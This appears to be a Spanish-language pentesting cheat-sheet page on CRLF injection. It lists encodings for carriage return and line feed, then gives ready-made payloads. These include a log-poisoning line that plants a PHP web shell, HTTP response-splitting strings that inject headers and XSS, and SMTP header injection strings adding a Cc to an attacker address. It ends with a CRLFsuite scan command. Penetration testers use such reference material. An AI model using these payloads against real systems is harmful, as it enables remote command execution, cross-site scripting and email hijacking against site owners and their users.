CRLF injection

Descripción
Carácter
ASCII (Dec)
Hex
URL Encoded

Carriage Return (CR)

\r

13

0x0D

%0D

Line Feed (LF)

\n

10

0x0A

%0A

CRLF

\r\n

13 10

0x0D0A

%0D%0A

Log injection

# Log poisoning
%0D%0A<?php system($_GET['cmd']); ?>

HTTP response splitting

# HTTP header
%0D%0AHeader-Test: value-test
# XSS
%0D%0A%0D%0A<html><script>alert(1)</script></html>
# HTTP header Content-Type + XSS
%0D%0AContent-Type: text/html%0D%0A%0D%0A<html><script>alert(1)</script></html>

SMTP header injection

# SMTP header
%0D%0AHeader-Test: value-test
## URL encoder
%0D%0AHeader-Test:+value-test

# SMTP header Cc
%0D%0ACc: email@attacker.com
%0D%0ACc: email@attacker.com%0D%0ADoesNotExist: True
## URL encoder
%0D%0ACc:+email%40attacker.com
%0D%0ACc:+email%40attacker.com%0D%0ADoesNotExist:+True

Herramientas

CRLFsuite

crlfsuite -t http://<target>/param1=value1&param2=value2
AnteriorXML external entity (XXE) injectionSiguienteXPath injection

Última actualización